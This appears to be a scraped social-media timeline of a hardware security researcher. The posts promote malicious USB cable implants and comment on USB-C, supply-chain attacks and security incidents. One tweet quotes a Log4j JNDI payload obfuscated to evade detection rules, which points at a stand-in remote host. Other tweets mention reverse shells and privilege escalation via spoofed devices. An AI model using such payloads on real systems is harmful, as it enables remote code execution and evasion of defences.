Nightmare Reifier. I sell some of them too: o.mg.lol & hak5.org/omg

Pinned Tweet
OMG Cable - The New Batch Now in USB C, the implant is much smaller, but it’s even more powerful than before. Smartphone/tablet attacks, extreme long range triggers, geofencing, etc. o.mg.lol
49
353
1,592
I like to read replies to posts like this just to remind myself how misinformed the general public is about “USB-C” So here is a thread looking at a few of them… 🧵1
Thunderbolt is so cool to me. like. you're telling me this one cable is; charging my laptop at 90W, providing a 5k60 video output, using the 3 USB3 ports on the back of my display as a hub, receiving video from my display's webcam, and sending hi-res audio to my display.
174
1,485
15,616
7,146,909
Seems Discord is having trouble mapping push notifications to the correct users. This was a DM sent between 2 other people. I did not receive the DM but I did receive this push notification. 😂 I bet this is connected to their new username change rollout.
76
742
7,411
850,448
BadUSB Cable #2. HID attack through an Apple MacBook USB-C charger. Great for shared workspaces! Build info coming this month. Still working out some things. These cables work on just about any device with a USB port (Mac/Win/Linux, phones too)
83
2,760
4,063
First, USB-C is a specification for the physical connector. NOT the protocol. And it intentionally supports multiple protocols like USB, USB-PD, Thunderbolt, DisplayPort, HDMI, PCIe, etc. Some protocols exclusively use USB-c, like USB-4, Thunderbolt 3 & 4, USB-PD. 🧵2
12
77
4,077
487,109
HID attacks via USB drives have become too suspicious. What about embedding the attack inside a USB cable? Just a quick test for a few things I'm hoping to make over the next month.
117
2,130
3,785
Love it
77
850
3,307
1,070,434
Hey what’s this camera button do? Oh...
87
852
3,267
The exploding Hezbollah pagers situation is an incredibly impressive supply chain attack by Israel (most likely). I am sure more details will come, but there are already some educated guesses to be made that narrow it down. 🧵1/n
62
625
2,973
842,011
Oh man, if this it what it looks (Okta got popped)… Blue Team everywhere is gonna be crazy busy.
68
943
2,724
And a lot of it has a belief that USB-C is somehow anti-Apple. Reality: Apple (& Intel) designed USB-C. The USB-Implementers Forum is responsible for USB-4, USB-PD, and many others. There are a lot of companies on the USB-IF, including Apple! 🧵4
12
63
2,712
450,932
Before making the OMG Cable, I was making malicious thumb drives… with a little extra 💥
51
193
2,466
184,844
Now, because a high quality C to C cable can support ALL of these protocols, people incorrectly think the protocols are the same thing. 🧵3
8
20
2,249
484,987
Most people with wired CarPlay that switched from a lighting cable to usb-c will notice how much more fragile the connection is if using cheap cables. That’s because the moving parts went from the socket (lightning) to the cable (USB-C). So cable quality matters more. 🧵6
16
48
2,096
325,871
A lot of people celebrate the cable “standardization” & low cost availability. It’s becoming common knowledge that there are 8 types of compliant cables. But people don’t understand that quality matters. Else, you get perceptions like this: 🧵5
8
29
1,784
429,064
“recognized as malware” is the end of the analysis? Bruh… At least share the exe so others can check it out and either validate this or put the nail in the coffin. There are so many ways something gets flagged without it being malicious itself. Down to being simply unsigned. The chances of this being intentionally malicious are very low. And you haven’t done nearly enough to demonstrate otherwise. That doesn’t mean it’s necessarily safe. You paid pennies above the cost of the hardware via AliExpress. That gets you the lowest effort software too, where security is not a concern.
23
105
1,822
232,410
Mr Self Destruct v1
67
698
1,696
Every time I travel, I let people charge their devices. Totally harmless. They never know who I am or what I normally do with USB cables, but maybe one day… 😂 This lady’s phone died a few min into a 5hr flight. I just wanted her to enjoy her time.
42
55
1,757
163,850
Decided to get one of those USB spy cables with hidden microphone & GPS cell tracker. Noticed a few things... (1/n)
20
967
1,645
Day in the life of hardware production. Thanks FedEx. Those fragile labels on every side of the box just complete the situation. 😂😭
84
79
1,596
180,401
You cant fix Hollywood with tariffs. It’s like watching kids who inherited a golden goose. It’s dying because they couldn’t do the easiest part: keep it fed. They see other people feeding their goose & decide the correct action is to poison those geese instead of feed their own.
29
100
1,689
30,582
It really is impressive how confidently wrong people are about this stuff. But also how it’s almost like it challenges their identity or something 😂 Anyway, if I left anything out, let me know. 🧵7
8
18
1,565
308,967
OMG! 2 months + 8 devs + O•MG Cable = malicious wireless implant update! This update brought to you by the chaos workshop elves: @d3d0c3d, @pry0cc, @clevernyyyy, @JoelSernaMoreno, @evanbooth, @noncetonic, @cnlohr, @RoganDawes More info: mg.lol/blog/omg-cable/ #OMGCable
44
681
1,494
Apple - Ever since Sonoma, you’ve been polling TouchID Keyboards at nearly 150,000 per second, seemingly only on Mac Studio & Mac Pro. Why??? That’s equal to ~1000 keyboards of packets on the bus. How many people are seeing performance issues because of this?
21
96
1,478
342,921
I confirmed with this person that this was a legit DM they sent to someone at this exact time. And that the intended recipient did actually receive the message. So why the hell am I getting someone else’s push notifications @discord ?!
7
18
1,333
74,437
How I gambled a year’s salary and lost. One of the many stories I have from building the OMG Cable.
42
168
1,456
276,779
The amount of stuff we are gonna find on xz backdoor is gonna keep coming. This is a great find. There are quite a few other things that suggest the author was complicit in the backdoor. #xz #xzbackdoor
6
102
1,360
258,866
I call this the "Break & Enter dropbox" and it pairs well with my Amazon Key (smartlock & smartcam combo). It's all current software. Amazon downplayed the last attack on this product because it needed an evil delivery driver to execute. This doesn't.
39
910
1,257
New details on the 2nd LastPass incident are fun: - got into Sr DevOp's home via vuln media software - installed keylogger - got master pass to corp vault (seemingly because it was being accessed from home computer) Cool to see that LastPass is sharing this level of detail. Most companies are vulnerable to an attack like this. Main post: support.lastpass.com/downloa… Incident 1 details: support.lastpass.com/help/in… Incident 2 details: support.lastpass.com/help/in…
25
323
1,297
343,936
Replying to @dontpannic
They are misinformed, yet confident. And confident enough that they jump into peoples mentions to “correct” them with bad information. Those are just facts. You are free to blame whoever you want.
10
8
1,241
78,167
No joke: a bunch of OMG Cables recently infected the USB cable supply chain. The manufacturer seems to have lost some OMG Cables and accidentally contaminated someone’s normal cable order. 🤣 Not quite sure how this will play out...
48
261
1,194
Intel i7 MacBook Pro next to a M1 Pro Max MacBook Pro. Both have been under the same light workload for the last hour.
I was pretty disappointed in the last 5 years of Macbook Pros. This new Apple silicon though... definitely changing my mind. Remember the first time you went from HDD to SSD? That's the last time I remember a perf bump to such an extreme.
30
240
1,224
Ok, this thing is pretty cool. Embedded Linux with 2.4ghz, 5ghz, & 6ghz radios. Easily replaceable battery. And most importantly, it feels solid in your hands. Well done @Hak5 crew! Wifi Pineapple Pager is going to become a favorite for a lot of people when the preorders start shipping.
30
98
1,281
82,145
Yes, if you aren’t aware, there are 8 possible spec compliant C to C cables. people.kernel.org/bleung/ Lets not count the non-compliant ones 😂 USB-IF has a labeling proposal to “fix” this. But mfgs are also YOLOing it and making cables look like NASCAR logos 🧵11
15
48
1,196
161,660
Windows escalation with an OMG cable: from Guest account to System user! Razer hasn’t fixed this for over a year now. o.mg.lol
24
284
1,163
Malicious hardware implant in the wild! I helped @LawrenceAbrams dig into this. It’s a hardware wallet with a malicious implant added. It’s being mailed to targets. Read about it here: bleepingcomputer.com/news/cr…
33
418
1,160
Want some techniques that many Red Teams have been using to circumvent MFA protections on accounts? Yeah, even “unphishable” versions. I’m sharing so that you can think about what’s coming, how you’ll do mitigations, etc. Its being seen in the wild more these days. 🧵1/n
15
369
1,082
Here are the logos that USB-IF released in late 2021. Only cables that have been certified by USB-IF will be allowed to have the logos. And they must have the logo to get certified. Yet somehow the Apple cable I bought yesterday doesn’t have any of them. 🤷‍♂️ 🧵12
26
34
1,093
131,760
To reiterate, a lot of companies are involved in the USB-IF now. One of the most inspirational & enlightening people in the USB-C space, for me, is @Laughing_Man. He opened my eyes to the complexity, beauty, & horrors of USB-C. 🧵8
5
9
1,041
269,650
Correction: The idea that Apple/Intel invented C & gave it to USB-IF is based on an industry rumor citation. It’s believable with the timing & numerous similarities with Lightning, but only rumor. Apple is still on USB-IF, so trying to say C is anti-Apple is silly either way 🧵9
14
22
1,006
245,533
Wall-of-Flipper It logs the hardware address of Flippers running BLE. It also logs the specific packets being sent from each. Runs on a Raspberry Pi. github.com/K3YOMI/Wall-of-Fl…
13
169
966
105,163
Replying to @SwiftOnSecurity
Fully documented in the maintenance manuals too! I’d assume some maintenance centers had pre-made “magic” connectors for it. But its not stopping people from doing a DIY version and accidentally mass-breeding Clippy piped.video/1KGvVx2Vp7I
7
20
945
51,408
Context: Kalani is on my friends list & basically a coworker. Receiving this was hilariously abnormal. I first assumed he sent to the wrong person. Then we dug in & realized what actually happened. He’s not the type to be ashamed of stuff, so was totally fine with posting this.
4
8
858
57,754
I lost $150k in hardware during shipping. The carrier closed the investigation with “it’s gone, sorry” So I started working through their org. Getting internal info. Eventually “bribing” some of the employees to dig a little deeper. 🧵1/n

ALT रंगबाज़ रंगबाज़फिरसे GIF

21
94
899
529,509
Y’all just use 1 data blocker for safe USB charging? Why not use 20 and hope you have enough layers to protect yourself, just like enterprise security services!
38
68
876
94,569
Those malicious USB cable prototypes from 2017? Here, have them. I’m calling it DemonSeed. It’s a good educational build. github.com/O-MG/DemonSeed Keep an eye on my feed during @BlackHatEvents & @defcon this year. I’ll have some free or near-cost build kits to hand out.
25
234
881
Demo of a work in progress. I’m looking for help with writing payloads. Come chat with me at @defcon if you’d like to collaborate. Power adapter. Silent infection. Cross platform. Not just Apple hardware. Project page with info: mg.lol/blog/charger/ 1/n
36
398
877
Lotta people getting defensive 😂 USB C (& even earlier USB) is a confusing mess, as my thread shows & tries to inform. Especially with all the protocols & cable types. The screenshots of confident-but-wrong “correction” reply guys isn’t purely a spec problem though :p 🧵10
7
7
856
169,559
New dev board just dropped. The developers of windows need to fix this huge security problem.
24
73
821
98,716
This marks 6 years since I started making malicious cables. This was another record year for the number of OMG Cables spreading around the globe. So here is another check in & retrospective. 🧵1/n
11
70
853
200,531
KnowB4 customers are some of the easiest to spearphish. This is just one example of why. Their official instructions tell customers to setup filter bypasses that any attacker can also use. In the instructions, they include absolutely no cautionary info about it. 🤡
31
183
785
That's a nice "jdni:ldap" detection you have there for #log4j. Would be a shame if someone were to: ${jndi:${lower:l}${lower:d}ap://badurl} (the cat & mouse game on this is great)
6
142
752
Hiding drones inside of the ceilings of cargo containers to get 1000km inside the border, automatically deploy, & the take out 40+ strategic bombers worth more than 1000x the cost of the drones. Imagine all the places you can hide drones… Drones are more than purely asymmetric warfare.
Ukraine today carried out one of the most impressive and significant operations of the war, with cargo containers outside of several airbases across Russia opening to reveal dozens of remote-controlled fpv drones which were used to target military aircraft at each of the bases. The bases confirmed to have been attacked include Olenya Air Base in the Murmansk Oblast, Belaya Air Base in the Irkutsk Oblast, Ivanovo Air Base in the Ivanovo Oblast, and Dyagilevo Air Base in the Ryazan Oblast, many of which are hundreds of not thousands of miles away from Ukraine and contain strategic bombers of the Russian Air Force. Ukrainian sources report that upwards of 40 Tu-95MS, Tu-160, and Tu-22M3 Long-Range Strategic Bombers we’re targeted and damaged in the attack, delivering one of the most significant blows in history to the Russian Air Force.
20
62
845
105,553
DemonSeed EDU is here Learn hardware hacking by making your own malicious USB cables. Every kit is a 2 pack. Share one with a friend? 🌚🔥 #OMGDemonSeedEDU shop.hak5.org/products/o-mg-…
27
223
758
Heads up, for anyone changing an iOS passcode to keep someone out. For iOS 17, old passcodes keeps working for 72 hours. Also, the old passcode can be used to reset your iCloud password! You can manually expire them but.. 🧵1/n support.apple.com/en-us/HT21…
14
261
717
204,755
I’ve had people asking for a solid year about this but had to keep my mouth shut. Here is your answer about OMG Cables and new 🍎 phone
14
117
661
193,879
Guess I have to remake this PCB. The C in USB C stands for Chaos. (Especially when you intentionally violate the spec)
25
77
631
I’m starting a new job in a month or two. An offense security role that hits all my goals (red + research + teaching). This will be fun 🌚🔥. Thanks for all the support. There were a whole lot of you, & I appreciate it. Now, time to chase some personal projects before I start.
59
14
642
For anyone worrying about this, I’d like to hear how you were already handling a near identical attack that didn’t require this vuln: - steal Yubikey - login - returns key WITHOUT cloning it, because 1 session is enough for most objectives Same attack flow. If that wasn’t already part of your threat model, why is this? If it was part of your threat model, how do your existing defenses not already handle the vuln? (I can think of a few, but none that apply to most of the people who are concerned) This should change very little for most people.
YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel arstechnica.com/?p=2046777
22
86
641
124,940
As a ClSSP certified in cyber, I think I need to inform Mike Lindell that the smoking gun is not in the routers. It is in the cables! This was an anonymous submission from an OMG Cable owner.
32
127
604
DuckyScript payload executing in a single video frame thanks the addition of “USB Overclocking” on the OMG Cable. The terminal window here was completely closed, not minimized! And it was a reverse shell that started running in the background but could apply to most payloads.
9
70
619
73,852
Lots of screenshots going around about Uber but this one shows how wide the hack is. "Security Response Break Glass Service Account" password 🔥
12
141
573
No amount of training a LLM will ever allow it to parse my notifications. But it sure is fun to watch it try on occasion.
6
22
622
19,154
Woke up to like 100 tags on this iPhone implant. Which is found in this video here: piped.video/watch?v=Q9K9ofWi… I don’t speak Russian, but I do have a first grade language fluency in hardware. So lets take a look! Thread 1/n
Quite interesting, a hardware iPhone implant discovered in Russia
10
171
587
I gambled a year’s salary and lost. This is what building a hardware product can look like, especially if it pushes limits. The OMG Cable has evolved a lot since this story, but it wouldn’t be what it is today without this gamble AND failure. The factory tooling I have built today is something I designed over the years to prevent and identify so many possible failures.
24
65
631
59,434
Heads up to anyone in prison, domestic abuse victims, people in "no phone" secure facilities, and chem teachers hiding meth phones in the ceiling. Oct 4 at 2:20pm ET all phones will get an emergency test message. fema.gov/press-release/20230…
10
188
538
120,996
Want cliff notes on the chip shortage? It’s fairly complex with all kinds of defensive & offensive tactics at play, but here is a summary from my position: 1/n
20
234
560
I will be dropping #OMGCables over the next few days of defcon. I will also have 5g bags of DemonSeed, if that’s your thing. I’ve been very busy with @d3d0c3d & @clevernyyyy. Details and update here: mg.lol/blog/defcon-2019/ 🌚🔥
32
181
570
The Razer & SteelSeries Windows PrivEsc vulns are fun, but there are tons of devices that may be vulnerable. We have a list of ~2500 possible devices! The easiest way to test is to use something like an OMG Cable or BashBunny to spoof the VID/PID. 1/n
7
160
557
One of my favorite interactions at defcon was being paid with a respectable counterfeit. Hologram strip, watermark, color shifting ink, security thread, embedded blue thread, etc. The wrong type of paper though :( Got better? I’ll gladly take it off your hands
51
75
540
The amount of electronics I still need to purge even after clearing this out… I haven’t even gotten to all the laptops, desktops, storage, etc.
107
11
573
28,697
Robert De Niro on a Netflix show (Zero Day) mentioning the OMG Cable! 😎
29
27
564
23,445
“recognized as malware” is the end of the analysis? Bruh… There are so many ways something gets flagged without it being malicious itself. Down to being simply unsigned. The chances of this being intentionally malicious are very low. And you haven’t done nearly enough to demonstrate otherwise. That doesn’t mean it’s necessarily safe. You paid pennies above the cost of the hardware via AliExpress. That gets you the lowest effort software too, where security is not a concern. More here:
Replying to @_MG_
If you read this as “China bad” then let me correct some things with more detail. China is huge. They have tons of talented people making quality products they care about. They have companies that stand behind their products and will respond to bug/vuln reports and fix them. And yes, even these places are susceptible to gov/legal coercion or even criminal coercion/contamination. It’s something you have to be aware of and build into your threat model. But China also excels at bottom cost manufacturing. The kind of stuff you find on TEMO, AliExpress, Amazon, etc. The factories making these often did not design product or really even understand them. They find design files that are free or sometimes a paid license. They effectively “print” thousands/millions of copies. And many other competing factories are “printing” the exact same thing. They rarely understand what the product does, which is why they all use the same product images/marketing. They certainly don’t have someone thinking about security or even a way to contact them to get anything fixed. I have tried! The inability to get things fixed is the real nail in the coffin for me. There are countless examples of it.
22
24
542
96,154
The recent spike in “no hook” phishing has been fun to watch. If you have examples, share them! Most of it seems to be for aging the numbers via interaction. An attempt to bypass automated spam detections. (click to expand full image)
24
73
474
Yikes. I hadn’t heard about this till now. CloudFlare was lobbying the government to investigate security researchers and question the legality of public research in general.
Replying to @k8em0
True story: After cloudbleed, cloudflare literally lobbied the FTC to investigate me and question the legality of openly discussing security research. How come they're not lobbying their DC friends to investigate the legality KF? 🤷‍♂️
6
120
454
More likely is they had cooperation/control of the actual factory building these and introduced custom internals built from the ground up. I guess we will just have to wait. There will be plenty of info to come. 🧵7/n
3
32
501
90,390
This Google bug could seriously hurt a lot of people. The default editing tool had a bug that lets you unredact & uncrop all images. Discord is used in this example because they don’t compress images. A good time to remind you: ALL image attachments are public links. Even for private channels and DMs an Discord.
Introducing acropalypse: a serious privacy vulnerability in the Google Pixel's inbuilt screenshot editing tool, Markup, enabling partial recovery of the original, unedited image data of a cropped and/or redacted screenshot. Huge thanks to @David3141593 for his help throughout!
8
123
495
184,248
Speaking of info to come: Pager networks broadcast every single message across the service area. A $10 SDR with computer can pick up every pager message near you. So someone has to know what the exact trigger message was by now. But I haven’t seen it yet. 🧵8/n
7
33
501
63,820
Dear diary: today I have been punished, again, for giving NSA tools to the masses. User 1 asked ChatGPT to find malware (after we denied them assistance). They not only blindly installed this malware but paid for it. It doesn’t do what was promised & the seller ghosted. User 1 wants us to support & advise on what to do. I’m sure everything is fine… 😐 User 2 complained about the USB-A connector on our product “not having sufficient clearance” which prevented connection to another USB-A port. After requesting they provide pictures 6 separate times & User 2 getting increasingly frustrated by the requests… “THERE JUST IS NOT ENOUGH CLEARANCE”… It was noticed that User 2 was attempting to connect 2 Male/Plug connectors together. I will now start offering an OMG USB Gender Studies class, with chapters on USB Connector Orientation & Advanced USB Coupling Techniques.
29
25
526
40,419
That requires electronics to filter for that exact message, then trigger detonator. Could be modified firmware, but you still need to get the electrical signal to the detonator. Some level of extra wiring/components is needed. For 1000+ units, feels like a whole custom PCB 🧵5/n
11
21
490
62,881
College Crim Justice textbook by @schmalleger shows Halo cosplay as "fully-functional undetectable 3D printed gun"
24
298
398
Good news everybody:
7
88
442
Did you know that a flashlight is all you need to detect a malicious USB cable? Well, some of them…
12
103
478
Introducing: HIDX StealthLink Run a remote shell through a “keyboard” that looks like a normal USB cable. It’s OMG Cable’s latest trick! o.mg.lol
12
98
470
100,900
Normalize public shaming of people who do this… if they don’t get Flipper banned everywhere first. When the annoy-a-tron & tv-b-gone were new, nobody was walking around with them pretending they were the main character in Watch Dogs. WTF
When you leave your iPhone Bluetooth on because you want to use your watch to keep an eye on your heart rate as I forgot my panic attack meds.. and some ass hat is out there turning off iPhones with the flipper zero. …
21
42
448
166,486
Of all the interviews I have done, this is probably the easiest to listen to because Jack is a great storyteller. First ~20min is a bio speed run. Then we cover OMG Cable creation & manufacturing challenges. Then some high risk customer stories (targeting US Gov assets, accessing evidence computers, etc). Spend some time on legal risks, ethics, etc. And lots in between.
New episode alert! Ep 161: MG In this episode we talk with @_MG_, the brilliant (and notorious) hacker and hardware engineer behind the OMG Cable. A seemingly ordinary USB cable with extraordinary offensive capabilities. darknetdiaries.com/episode/1…
19
61
488
48,299
There’s lots of talk about this being done fully remotely by exploding the lithium battery in the suspected AR-924 pager. A High Explosives expert can correct me, but this is NOT what lithium looks like 2 frames into explosion. Let alone the bodily damage happening. 🧵9/n
11
32
450
69,375